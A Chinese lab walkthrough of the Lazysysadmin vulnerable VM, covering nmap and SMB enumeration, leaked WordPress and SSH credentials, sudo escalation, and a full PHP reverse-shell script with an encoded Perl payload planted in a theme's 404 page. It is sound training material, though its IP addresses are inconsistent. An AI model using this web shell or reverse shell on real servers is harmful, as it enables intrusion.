Lazysysadmin靶机
Posted bingtang123
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Lazysysadmin靶机相关的知识,希望对你有一定的参考价值。
仅供个人娱乐
靶机信息
Lazysysadmin靶机百度云下载链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ提取码:q6zo
信息收集
nmap全端口扫
nmap -sS -Pn -A -p- -n 192.168.181.192
别的不管,6667这个端口一定不能放过,想到之前在Metasploitable2渗透实战中,在6667端口运行着 UnreaIRCD IRC,直接上msf打掉,这次虽然没成功,但要保持警惕。
smb枚举探测
看到139和445端口,这都是高危的共享端口,自己也在用linux的共享服务,先用enum4linux -S枚举出靶机的共享目录
enum4linux -S 192.168.181.129
直接探测出以下共享文件:
dir爆目录
在wordpress首页中,发现“My name is togie. ”,登录的用户名可能有togie
爆一下wordpress用户名
http://192.168.181.129/wordpress/?author=1
漏洞利用
smbclient访问共享目录
smbclient //192.168.181.129/share$
在win中,直接输入 \192.168.181.129share$
wordpress拿站可以直接奔着 wp-config.php去,
登录账号、密码:Admin / TogieMYSQL12345^^
在share$目录中发现两个重要的txt文件:todolist.txt 和 deets.txt
在deets.txt中:
CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345
在todolist.txt中
Prevent users from being able to view to web root using the local file browser
方法一、ssh登录提权
想必登录服务器的密码是12345,用户可能是togie
看到了能直接sudo su,提权
到根目录下,get flag吧
方法二:webshell提权
找到wp-config.php中,账号、密码分别为:Admin / TogieMYSQL12345^^
登录wordpress站点,在Appearance的Editor中编辑404页面,可以挂上小马,连菜刀;也可以直接反弹shell到kali:192.168.181.129
php反弹shell脚本:
<?php
function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); }
function execute($cfe) { $res = ‘‘; if ($cfe) { if(function_exists(‘exec‘)) { @exec($cfe,$res); $res = join(" ",$res); } elseif(function_exists(‘shell_exec‘)) { $res = @shell_exec($cfe); } elseif(function_exists(‘system‘)) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists(‘passthru‘)) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ‘‘; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; }
function cf($fname,$text){ if($fp=@fopen($fname,‘w‘)) { @fputs($fp,@base64_decode($text)); @fclose($fp); } } $yourip = "192.168.181.129"; $yourport = ‘4444‘; $usedb = array(‘perl‘=>‘perl‘,‘c‘=>‘c‘); $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf(‘/tmp/.bc‘,$back_connect); $res = execute(which(‘perl‘)." /tmp/.bc $yourip $yourport &"); ?>
kali监听:
nc -lvp 4444
触发反弹:
http://192.168.8.130/wordpress/wp-content/themes//twentyfifteen/404.php
利用python语句切换到/bin/bash
python -c ‘import pty;pty.spawn("/bin/bash")‘
没办法,这里还是只能利用deets.txt文件中的密码(12345),账号用wordpress首页提示的用户名 togie,进行sudo提权
以上是关于Lazysysadmin靶机的主要内容,如果未能解决你的问题,请参考以下文章